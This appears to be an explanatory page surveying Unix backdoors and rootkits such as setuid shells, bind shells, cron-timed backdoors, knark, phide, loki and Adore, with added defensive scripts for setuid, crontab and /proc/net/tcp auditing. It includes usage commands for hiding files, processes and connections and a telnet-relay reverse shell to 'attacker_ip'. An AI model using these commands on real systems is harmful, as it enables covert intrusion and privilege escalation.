Overview
Moreover, a Trojan horse differs from a backdoor in that it is planted passively, through the carelessness or unwitting cooperation of a privileged user. Recently discovered Trojan horses and backdoors also behave like viruses or worms, and the distinction between the categories is often blurred.
In addition, spyware: distributors of software such as shareware obtain the user's consent in advance, extract information such as the user's Internet habits (for example online-shopping and other consumption patterns), and use it as marketing data. For users outside the English-speaking world this often happens without their being aware of it, so they should make a habit of reading such agreements carefully before using the software.
In this form a program is modified in a suitable way, or hidden in a directory that is hard to find, and the setuid bit is set on it while the attacker still holds privileges. Later, merely running that program is enough for the attacker to regain those privileges.
Note: On Solaris and some Linux systems the shell (bash) behaves differently depending on how it is invoked: bash resets the effective user id to the real user id on startup unless it is run with the -p (privileged) option, so a setuid shell only keeps its privileges when started that way.
This example is a simple C program that launches a shell. It is run with the setuid bit set and contains a routine that uses the effective user id (euid) to change the real user id (uid) to match.
Note: Only a process whose effective user id is 0 (root) can set the real user id to an arbitrary value.
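The check a practitioner wants against the setuid technique above is an inventory of setuid/setgid files compared against a saved baseline: a planted setuid shell in an obscure directory shows up as a line that is in the current listing but not in the baseline. The functions below are an added example, not code from the original page; they assume Linux with GNU coreutils (stat -c) and paths without embedded spaces or newlines.

```shell
#!/bin/sh
# Added example: inventory setuid/setgid files and diff them against a baseline.

# List setuid or setgid regular files below $1, one per line as
# "<mode> <owner-uid> <path>", sorted so that two runs can be compared with comm(1).
# -xdev keeps the scan on one filesystem; run it once per mounted filesystem.
list_setuid() {
  find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
    -exec stat -c '%A %u %n' {} + 2>/dev/null | sort
}

# Print entries present in the current listing ($2) but absent from the baseline ($1).
new_setuid() {
  comm -13 "$1" "$2"
}

# Scan $1 and compare with the baseline file $2 (itself produced by list_setuid).
# Prints nothing and returns 0 when nothing new was found; prints the new
# entries and returns 1 otherwise, so it can be used from cron or a monitoring job.
check_setuid() {
  dir=$1; baseline=$2
  tmp=$(mktemp) || return 2
  list_setuid "$dir" > "$tmp"
  found=$(new_setuid "$baseline" "$tmp")
  rm -f "$tmp"
  if [ -n "$found" ]; then
    printf '%s\n' "$found"
    return 1
  fi
  return 0
}
```

Typical use is `list_setuid / > /var/lib/setuid.baseline` right after installation (keep the baseline off the host, since a rootkit that trojans ls and find will also happily edit a file), then `check_setuid / /var/lib/setuid.baseline` from a scheduled job. The owner uid is part of the record because a setuid file owned by an unprivileged user is harmless while the same mode on a root-owned file is a root shell.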
This program binds a shell to TCP port 31337. Connecting to port 31337 from a remote host with a program such as telnet or nc (netcat) yields a root shell immediately, with no login or authentication step. When telnet is used, however, a command separator (;) must be appended to the end of each command.
Note: This is a backdoor program that can be accessed remotely in the same way as telnetd. TDM cannot use the telnet, rlogin and ftp commands, but this backdoor can. However, you have to set the correct line ending (return code) in the telnet client. If you cannot change it, a "CR" will be appended to what is sent, so type ";" at the end of your command.
This program is a root-shell backdoor written in Perl. The server, audpserver, binds a shell to UDP port 520 (the port registered for route/RIP), and the client, audpclient, connects to it.
This backdoor is registered in a crontab file so that the program runs only during a chosen time window (when no administrator is around). The method relies on the fact that outside that window neither a listening port nor a process is visible, only the crontab entry, so an administrator has a hard time noticing it. This particular program starts at 2 a.m., opens TCP port 31337, and kills its own process one hour later to remove the traces.
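Since the crontab entry is the one artifact of this backdoor that is always present, the practical check is to audit every crontab for it. The function below is an added example, not code from the original page: it reads user-crontab text (five time fields followed by the command) on standard input and flags entries that run in a quiet window, invoke a network tool, kill a process, or reference a temp or dot-directory path. The sample crontab in the test is constructed, and the heuristics and the 0..5 default window are assumptions to tune locally.

```shell
#!/bin/sh
# Added example: flag crontab entries that match the time-window backdoor pattern.

# Read crontab(5) text on stdin and print "<reasons>: <line>" for suspicious entries.
# $1 = first hour of the quiet window, $2 = last hour (inclusive); default 0..5.
# Only a plain numeric hour field is checked against the window; "*", lists and
# ranges are left to the other heuristics. For /etc/crontab and /etc/cron.d
# (which carry a user field before the command) start the command at field 7.
audit_crontab() {
  from=${1:-0}; to=${2:-5}
  awk -v from="$from" -v to="$to" '
    /^[ \t]*(#|$)/ { next }                       # comments and blank lines
    /^[ \t]*[A-Za-z_][A-Za-z0-9_]*=/ { next }     # VAR=value lines
    {
      hour = $2
      cmd = ""
      for (i = 6; i <= NF; i++) cmd = cmd (i > 6 ? " " : "") $i
      reason = ""
      if (hour ~ /^[0-9]+$/ && hour + 0 >= from + 0 && hour + 0 <= to + 0)
        reason = "quiet-hours job"
      if (cmd ~ /(^|[^A-Za-z])(nc|ncat|netcat|telnet)([^A-Za-z]|$)/ || cmd ~ /\/dev\/tcp\//)
        reason = reason (reason ? "; " : "") "network tool"
      if (cmd ~ /(^|[^A-Za-z])(kill|pkill|killall)([^A-Za-z]|$)/)
        reason = reason (reason ? "; " : "") "kills a process"
      if (cmd ~ /\/tmp\/|\/var\/tmp\/|\/dev\/shm\/|\/\./)
        reason = reason (reason ? "; " : "") "hidden or temp path"
      if (reason) print reason ": " $0
    }'
}

# Audit every user crontab on a system that keeps them under one spool directory
# (assumed /var/spool/cron/crontabs here; Red Hat-style systems use /var/spool/cron).
audit_all_user_crontabs() {
  for f in /var/spool/cron/crontabs/*; do
    [ -f "$f" ] || continue
    audit_crontab | sed "s|^|$(basename "$f"): |" < "$f"
  done
}
```

Read the spool files directly rather than via `crontab -l`: a trojaned crontab binary (as in the rootkit package listed further down) hides entries, while the spool file on disk is what cron actually executes.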
This package includes the following:
bindshell - port/shell type daemon!
chfn - Trojaned! User->r00t
chsh - Trojaned! User->r00t
crontab - Trojaned! Hidden Crontab Entries
du - Trojaned! Hide files
find - Trojaned! Hide files
fix - File fixer!
ifconfig - Trojaned! Hide sniffing
inetd - Trojaned! Remote access
killall - Trojaned! Won't kill hidden processes
linsniffer - Packet sniffer!
login - Trojaned! Remote access
ls - Trojaned! Hide files
netstat - Trojaned! Hide connections
passwd - Trojaned! User->r00t
pidof - Trojaned! Hide processes
ps - Trojaned! Hide processes
rshd - Trojaned! Remote access
sniffchk - Program to check if sniffer is up and running
syslogd - Trojaned! Hide logs
tcpd - Trojaned! Hide connections, avoid denies
top - Trojaned! Hide processes
wted - wtmp/utmp editor!
z2 - Zap2 utmp/wtmp/lastlog eraser!
This program is a backdoor that uses the CGI interface. As long as the server part is installed in the web server's /cgi-bin directory, it can be reached remotely with the client program.
This program is accessed with a text-based browser such as lynx and is protected by a password so that only its owner can use it.
kbd is a nice little backdoor that allows root access by modifying the SYS_stat and SYS_getuid system calls. Usage after insmod is fairly straightforward:
1. login as a normal user
2. host:~$ touch foobar
3. login again under the *same* username
4. the second login session will be given root privileges
   host:~# id
   uid=0(root) gid=0(root) groups=100(users)
5. Remember to repeat this procedure every time you plan on using the backdoor. To keep this covert, the special uid resets after root is given out; this prevents the legitimate owner of the account from receiving a suspicious root shell when he/she logs in.
This kernel module backdoor hides the process and its child processes.

Compiling instructions:
=======================
phide_mod.c   gcc -c -fomit-frame-pointer -O2 phide_mod.c
phide.c       gcc -o phide -O2 phide.c

Add -DONLY_ROOT_CAN_HIDE when compiling phide_mod.c if you don't want non-root users to be able to hide processes.

Usage for dummies:
==================
If you read the source instead, you can skip this section =>

apelsin:~/kernel/phide$ gcc -o phide -O2 phide.c
apelsin:~/kernel/phide$ gcc -c -fomit-frame-pointer -O2 phide_mod.c
apelsin:~/kernel/phide$ su -
Password:
apelsin:~# insmod ~tm/kernel/phide/phide_mod.o
apelsin:~# exit
apelsin:~/kernel/phide$ ps a
  PID TTY   STAT TIME COMMAND
  156 ttyp0 S    0:00 -bash
  729 ttyp0 R    0:00 ps a
apelsin:~/kernel/phide$ ./phide +156
apelsin:~/kernel/phide$ ps a
  PID TTY   STAT TIME COMMAND
Note! Our ps command won't be shown since it's a child of our shell session which we just hid.
apelsin:~/kernel/phide$ ./phide -156
apelsin:~/kernel/phide$ ps a
  PID TTY   STAT TIME COMMAND
  156 ttyp0 S    0:00 -bash
  771 ttyp0 R    0:00 ps a
hidef
Used to hide files on the system. Create your hax0r-directory /usr/lib/.hax0r, and type:
./hidef /usr/lib/.hax0r
Now this directory will be hidden, and won't be shown by ls or du. Subdirs and files will be hidden as well, so you don't have to hidef anything you put in this directory.

unhidef
Used to unhide hidden files. You can cat /proc/knark/files if you've forgotten which files you've hidden. Type:
./unhidef /usr/lib/.hax0r
to make your previously hidden directory visible again. However, there is a bug in the module which makes directory trees start from their mount-point. This means, if you have a filesystem mounted to /mnt, and you hide the file /mnt/secret, this file will show up as /secret in /proc/knark/files. Files in the root-filesystem aren't affected.

ered
Used to configure exec-redirection. Copy your sshd trojan to /usr/lib/.hax0r/sshd_trojan, and type:
./ered /usr/local/sbin/sshd /usr/lib/.hax0r/sshd_trojan
Now, when /usr/local/sbin/sshd is supposed to be executed, your trojan program will be executed instead. To clear all exec-redirection entries, type:
./ered -c

nethide
Used to hide strings in /proc/net/tcp and /proc/net/udp. This is where netstat gets its information. Type:
./nethide ":ABCD "
to hide connections to/from port ABCD hex (43981 dec). This will "grep -v" the line ":ABCD " from /proc/net/[tcp|udp]. You have to understand the output from /proc/net/[tcp|udp] to use this program. Let's say that you have sshd running on your box. Connect to localhost port 22, and type:
netstat -at
One of the lines looks like this:
Proto Recv-Q Send-Q Local Address    Foreign Address   State
tcp        0      0 localhost:ssh    localhost:1023    ESTABLISHED
And now, let's check /proc/net/tcp. Type:
cat /proc/net/tcp
One of the lines looks like this:
  sl local_address rem_address   st ...
   0: 0100007F:0016 0100007F:03FF 01 00000000:00000000 00:00000000 00000000
If we want to hide everything about ip-address 127.0.0.1, we have to translate it to this format. Start with 127: 7F in hex. Then 0: 00 in hex, which gives us 007F. And 0 again: 00007F, and at last 1, which gives us the number 0100007F. Now, if we want to hide everything about port 22 and ip-address 127.0.0.1 it looks like this: 0100007F:0016 (0016 is port 22 in hex). So, typing:
./nethide "0100007F:0016"
will hide connections to/from localhost port 22, and typing:
./nethide ":ABCD "
will remove all lines containing ":ABCD ". It's like "grep -v". Do you get it? :-)

rootme
Used to gain root-access without using suid programs. Type:
./rootme /bin/sh
to execute /bin/sh with root-privs. This will also work:
./rootme /bin/ls -l /root
You have to type the whole path-name of the binary to execute.

taskhack
Used to change *uid's and *gid's of running processes. Type:
./taskhack -alluid=0 pid
This will change all *uid's (uid, euid, suid, fsuid) of process "pid" to 0 (root). Type:
ps aux | grep bash
creed     91  0.0  1.3  1424  824  1 S  15:31  0:00 -bash
Now, we want to change the euid of this process to 0 (root). Type:
./taskhack -euid=0 91
ps aux | grep bash
root (!)  91  0.0  1.3  1424  824  1 S  15:31  0:00 -bash
Isn't this just great? :-)
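The /proc/net/tcp translation that the nethide text walks through by hand is easy to get backwards (the address bytes are printed least-significant first on little-endian hosts), so the functions below do it in both directions and decode a whole table. They are an added example, not knark's code or code from the original page. The sample table is constructed for the test and contains a listener on 0.0.0.0:31337 (7A69 hex, the bind-shell port used elsewhere on this page) plus the ssh connection from the text; it assumes the IPv4 table layout of /proc/net/tcp and a little-endian kernel.

```shell
#!/bin/sh
# Added example: /proc/net/tcp address encoding, both directions.

# "0100007F:0016" -> "127.0.0.1:22". The eight hex digits are the address in
# host byte order, so on x86 the first byte pair is the LAST octet.
proc_to_inet() {
  a=${1%%:*}; p=${1##*:}
  b1=${a%??????}                      # hex digits 1-2  -> 4th octet
  b2=${a#??}; b2=${b2%????}           # hex digits 3-4  -> 3rd octet
  b3=${a#????}; b3=${b3%??}           # hex digits 5-6  -> 2nd octet
  b4=${a#??????}                      # hex digits 7-8  -> 1st octet
  printf '%d.%d.%d.%d:%d\n' "$((0x$b4))" "$((0x$b3))" "$((0x$b2))" "$((0x$b1))" "$((0x$p))"
}

# 127.0.0.1 22 -> "0100007F:0016", the string nethide expects. Runs in a
# subshell so the IFS change used to split the octets does not leak out.
inet_to_proc() {
  ( IFS=.; set -- $1 "$2"; printf '%02X%02X%02X%02X:%04X\n' "$4" "$3" "$2" "$1" "$5" )
}

# Decode a /proc/net/tcp table from stdin into "local remote state" lines.
# State 0A is LISTEN, 01 is ESTABLISHED (see the kernel's TCP_* enum).
decode_proc_tcp() {
  tail -n +2 | while read -r sl laddr raddr st rest; do
    printf '%s %s %s\n' "$(proc_to_inet "$laddr")" "$(proc_to_inet "$raddr")" "$st"
  done
}

# Print the raw table lines (stdin) whose local or remote endpoint is $1:$2.
grep_endpoint() {
  grep -F -- "$(inet_to_proc "$1" "$2")"
}

# Constructed sample in /proc/net/tcp format (not a real capture).
sample_proc_tcp() {
  cat <<'EOF'
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:7A69 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 0100007F:0016 0100007F:03FF 01 00000000:00000000 00:00000000 00000000     0        0 12346 1 0000000000000000 20 4 30 10 -1
EOF
}

sample_proc_tcp | decode_proc_tcp
```

On a live host run `decode_proc_tcp < /proc/net/tcp`. Because nethide filters the /proc text itself, anything it hides is also missing from this output; the useful comparison is against a source that does not go through /proc, for example `ss -tan` on a kernel where ss can use the sock_diag netlink interface, or a port scan of the host from another machine. A listener that the scanner sees but /proc/net/tcp does not is the signature of exactly this kind of filter.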
The client (loki) sends commands to the server embedded in ICMP (or UDP) packets, and the server (lokid) returns the results embedded in the same way, so the two can communicate covertly across a network protected by a firewall that lets such packets through.
Usage:
1. Server side (= target system)
   ~# ./lokid -p i -v 1
2. Client side (= attacker's system)
   ~# ./loki -d target_ip -p i -v 1 -t 3
   loki>
Where a firewall allows network traffic only to certain ports, this backdoor emulates a telnet session over the permitted ports: the target connects out to one permitted port on the attacker's host and feeds what it receives to a shell, and the shell's output is sent back over a second connection to another permitted port, which together establish a session through the firewall.
Usage:
1. Server side (= attacker's system)
   ~# nc -nvv -l -p 80
   and, in another window
   ~# nc -nvv -l -p 25
2. Client side (= target system)
   ~# sleep 10000 | telnet attacker_ip 80 | /bin/sh | telnet attacker_ip 25
Commands typed into the port-80 listener are executed by /bin/sh on the target, and their output appears on the port-25 listener; the leading sleep keeps the first telnet's standard input open so it does not exit.
Adore is a Linux LKM-based rootkit. Features smart PROMISC flag hiding, persistent file and directory hiding (still hidden after reboot), process hiding, netstat hiding, a rootshell backdoor, and an uninstall routine. Includes a userspace program to control everything. Changes: improved promisc hiding, port hiding fixed, and a readme. By Stealth.
A basic backdoor program, but with a couple of neat features that "secure" the backdoor from being widely misused.
A kernel module which allows administrators to log all the commands executed by users.